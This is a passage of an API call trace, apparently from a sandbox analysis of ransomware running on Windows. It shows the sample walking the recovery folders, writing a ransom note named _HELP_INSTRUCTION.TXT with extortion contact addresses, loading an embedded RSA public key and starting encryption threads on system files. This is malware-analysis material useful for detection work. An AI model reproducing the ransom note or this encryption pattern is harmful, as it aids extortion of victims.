lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0032.439] lstrcatW (in: lpString1="C:\\", lpString2="Recovery" | out: lpString1="C:\\Recovery") returned="C:\\Recovery" [0032.439] SetErrorMode (uMode=0x1) returned 0x1 [0032.439] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Recovery" | out: lpString1="C:\\Recovery") returned="C:\\Recovery" [0032.439] lstrcatW (in: lpString1="C:\\Recovery", lpString2="\\" | out: lpString1="C:\\Recovery\\") returned="C:\\Recovery\\" [0032.439] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Recovery\\" | out: lpString1="C:\\Recovery\\") returned="C:\\Recovery\\" [0032.439] lstrcatW (in: lpString1="C:\\Recovery\\", lpString2="*.*" | out: lpString1="C:\\Recovery\\*.*") returned="C:\\Recovery\\*.*" [0032.439] FindFirstFileW (in: lpFileName="C:\\Recovery\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.440] PathFindFileNameW (pszPath="C:\\Recovery") returned="Recovery" [0032.440] lstrcpyW (in: lpString1=0x17e824, lpString2="Recovery" | out: lpString1="Recovery") returned="Recovery" [0032.440] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.440] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.440] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0 [0032.440] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 1 [0032.440] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 0 [0032.440] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Recovery" | out: lpString1="C:\\Recovery") returned="C:\\Recovery" [0032.440] lstrcatW (in: lpString1="C:\\Recovery", lpString2="\\*.*" | out: lpString1="C:\\Recovery\\*.*") returned="C:\\Recovery\\*.*" [0032.440] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="Desktop") returned 0x0 [0032.440] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="DESKTOP") returned 0x0 [0032.440] SetErrorMode (uMode=0x1) returned 0x1 [0032.441] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Recovery\\_HELP_INSTRUCTION.TXT") returned 33 [0032.441] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0032.441] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0032.441] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x384) returned 0x0 [0032.441] RegQueryValueExW (in: hKey=0x384, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3dd8a68, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3dd8a68*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0032.441] RegCloseKey (hKey=0x384) returned 0x0 [0032.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0032.441] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0032.441] CreateFileW (lpFileName="C:\\Recovery\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\recovery\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.441] CreateFileW (lpFileName="C:\\Recovery\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\recovery\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384 [0032.442] WriteFile (in: hFile=0x384, lpBuffer=0x17c61c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17c614, lpOverlapped=0x0 | out: lpBuffer=0x17c61c*, lpNumberOfBytesWritten=0x17c614*=0x2c4, lpOverlapped=0x0) returned 1 [0032.442] CloseHandle (hObject=0x384) returned 1 [0032.443] FindFirstFileW (in: lpFileName="C:\\Recovery\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.443] PathFindFileNameW (pszPath="C:\\Recovery") returned="Recovery" [0032.443] lstrcpyW (in: lpString1=0x17e824, lpString2="Recovery" | out: lpString1="Recovery") returned="Recovery" [0032.443] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0032.443] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0032.443] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.443] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0032.443] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.443] lstrcmpW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="..") returned 1 [0032.443] lstrcmpW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2=".") returned 1 [0032.443] lstrcpyW (in: lpString1=0x17f6b0, lpString2="C:\\Recovery" | out: lpString1="C:\\Recovery") returned="C:\\Recovery" [0032.443] lstrcatW (in: lpString1="C:\\Recovery", lpString2="\\" | out: lpString1="C:\\Recovery\\") returned="C:\\Recovery\\" [0032.443] lstrcatW (in: lpString1="C:\\Recovery\\", lpString2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b" | out: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" [0032.443] SetErrorMode (uMode=0x1) returned 0x1 [0032.443] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" | out: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" [0032.443] lstrcatW (in: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="\\" | out: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" [0032.443] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" | out: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" [0032.443] lstrcatW (in: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpString2="*.*" | out: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*") returned="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*" [0032.443] FindFirstFileW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3246b8 [0032.443] PathFindFileNameW (pszPath="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned="e9e23962-4a25-11e7-88e8-91fb2ec43f0b" [0032.443] lstrcpyW (in: lpString1=0x17d784, lpString2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b" | out: lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned="e9e23962-4a25-11e7-88e8-91fb2ec43f0b" [0032.443] FindNextFileW (in: hFindFile=0x3246b8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.443] FindNextFileW (in: hFindFile=0x3246b8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.443] lstrcmpW (lpString1="boot.sdi", lpString2="..") returned 1 [0032.443] lstrcmpW (lpString1="boot.sdi", lpString2=".") returned 1 [0032.444] StrStrW (lpFirst="boot.sdi", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0032.444] StrStrW (lpFirst="boot.sdi", lpSrch="ntldr") returned 0x0 [0032.444] StrStrW (lpFirst="boot.sdi", lpSrch="NTLDR") returned 0x0 [0032.444] StrStrW (lpFirst="boot.sdi", lpSrch="NTDETECT.COM") returned 0x0 [0032.444] StrStrW (lpFirst="boot.sdi", lpSrch="ntdetect.com") returned 0x0 [0032.444] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch="Desktop") returned 0x0 [0032.444] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch="DESKTOP") returned 0x0 [0032.444] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned 53 [0032.444] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0032.444] lstrcpyW (in: lpString1=0x17dfbc, lpString2="boot.sdi" | out: lpString1="boot.sdi") returned="boot.sdi" [0032.444] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" [0032.444] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x38c [0032.444] Sleep (dwMilliseconds=0x96) [0032.600] FindNextFileW (in: hFindFile=0x3246b8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.600] lstrcmpW (lpString1="Winre.wim", lpString2="..") returned 1 [0032.600] lstrcmpW (lpString1="Winre.wim", lpString2=".") returned 1 [0032.600] StrStrW (lpFirst="Winre.wim", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0032.600] StrStrW (lpFirst="Winre.wim", lpSrch="ntldr") returned 0x0 [0032.600] StrStrW (lpFirst="Winre.wim", lpSrch="NTLDR") returned 0x0 [0032.600] StrStrW (lpFirst="Winre.wim", lpSrch="NTDETECT.COM") returned 0x0 [0032.600] StrStrW (lpFirst="Winre.wim", lpSrch="ntdetect.com") returned 0x0 [0032.600] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch="Desktop") returned 0x0 [0032.600] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch="DESKTOP") returned 0x0 [0032.600] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned 53 [0032.600] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0032.600] lstrcpyW (in: lpString1=0x17dfbc, lpString2="Winre.wim" | out: lpString1="Winre.wim") returned="Winre.wim" [0032.600] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" [0032.600] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x398 [0032.601] Sleep (dwMilliseconds=0x96) [0032.787] FindNextFileW (in: hFindFile=0x3246b8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0 [0032.787] FindClose (in: hFindFile=0x3246b8 | out: hFindFile=0x3246b8) returned 1 [0032.788] FindClose (in: hFindFile=0x3246b8 | out: hFindFile=0x3246b8) returned 0 [0032.788] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" | out: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" [0032.788] lstrcatW (in: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="\\*.*" | out: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*") returned="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*" [0032.788] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch="Desktop") returned 0x0 [0032.788] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch="DESKTOP") returned 0x0 [0032.788] SetErrorMode (uMode=0x1) returned 0x1 [0032.788] wsprintfW (in: param_1=0x17d57c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\_HELP_INSTRUCTION.TXT") returned 70 [0032.788] GetUserNameW (in: lpBuffer=0x17b358, pcbBuffer=0x17b144 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17b144) returned 1 [0032.788] wsprintfW (in: param_1=0x17b150, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0032.788] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17b14c | out: phkResult=0x17b14c*=0x3ac) returned 0x0 [0032.788] RegQueryValueExW (in: hKey=0x3ac, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3dd8c98, lpcbData=0x17b148*=0x104 | out: lpType=0x0, lpData=0x3dd8c98*=0x65, lpcbData=0x17b148*=0x4a) returned 0x0 [0032.788] RegCloseKey (hKey=0x3ac) returned 0x0 [0032.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17c57c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0032.788] wsprintfW (in: param_1=0x17b57c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0032.788] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.788] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3ac [0032.789] WriteFile (in: hFile=0x3ac, lpBuffer=0x17b57c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17b574, lpOverlapped=0x0 | out: lpBuffer=0x17b57c*, lpNumberOfBytesWritten=0x17b574*=0x2c4, lpOverlapped=0x0) returned 1 [0032.789] CloseHandle (hObject=0x3ac) returned 1 [0032.789] FindFirstFileW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3246b8 [0032.790] PathFindFileNameW (pszPath="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned="e9e23962-4a25-11e7-88e8-91fb2ec43f0b" [0032.790] lstrcpyW (in: lpString1=0x17d784, lpString2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b" | out: lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned="e9e23962-4a25-11e7-88e8-91fb2ec43f0b" [0032.790] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0032.790] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0032.790] FindNextFileW (in: hFindFile=0x3246b8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.790] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0032.790] FindNextFileW (in: hFindFile=0x3246b8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.790] FindNextFileW (in: hFindFile=0x3246b8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.790] FindNextFileW (in: hFindFile=0x3246b8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0032.790] FindNextFileW (in: hFindFile=0x3246b8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0 [0032.790] FindClose (in: hFindFile=0x3246b8 | out: hFindFile=0x3246b8) returned 1 [0032.790] FindClose (in: hFindFile=0x3246b8 | out: hFindFile=0x3246b8) returned 0 [0032.790] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.790] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0 [0032.790] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 1 [0032.790] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 0 [0032.790] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.790] lstrcmpW (lpString1="System Volume Information", lpString2="..") returned 1 [0032.790] lstrcmpW (lpString1="System Volume Information", lpString2=".") returned 1 [0032.790] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0032.790] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0032.790] lstrcatW (in: lpString1="C:\\", lpString2="System Volume Information" | out: lpString1="C:\\System Volume Information") returned="C:\\System Volume Information" [0032.790] SetErrorMode (uMode=0x1) returned 0x1 [0032.790] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\System Volume Information" | out: lpString1="C:\\System Volume Information") returned="C:\\System Volume Information" [0032.790] lstrcatW (in: lpString1="C:\\System Volume Information", lpString2="\\" | out: lpString1="C:\\System Volume Information\\") returned="C:\\System Volume Information\\" [0032.791] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\System Volume Information\\" | out: lpString1="C:\\System Volume Information\\") returned="C:\\System Volume Information\\" [0032.791] lstrcatW (in: lpString1="C:\\System Volume Information\\", lpString2="*.*" | out: lpString1="C:\\System Volume Information\\*.*") returned="C:\\System Volume Information\\*.*" [0032.791] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0032.791] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0032.791] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\System Volume Information" | out: lpString1="C:\\System Volume Information") returned="C:\\System Volume Information" [0032.791] lstrcatW (in: lpString1="C:\\System Volume Information", lpString2="\\*.*" | out: lpString1="C:\\System Volume Information\\*.*") returned="C:\\System Volume Information\\*.*" [0032.791] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="Desktop") returned 0x0 [0032.791] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="DESKTOP") returned 0x0 [0032.791] SetErrorMode (uMode=0x1) returned 0x1 [0032.791] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\System Volume Information\\_HELP_INSTRUCTION.TXT") returned 50 [0032.791] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0032.791] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0032.791] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x3b8) returned 0x0 [0032.791] RegQueryValueExW (in: hKey=0x3b8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3dd8ec8, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3dd8ec8*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0032.791] RegCloseKey (hKey=0x3b8) returned 0x0 [0032.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0032.791] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0032.791] CreateFileW (lpFileName="C:\\System Volume Information\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\system volume information\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.791] CreateFileW (lpFileName="C:\\System Volume Information\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\system volume information\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0032.792] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0032.792] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0032.792] 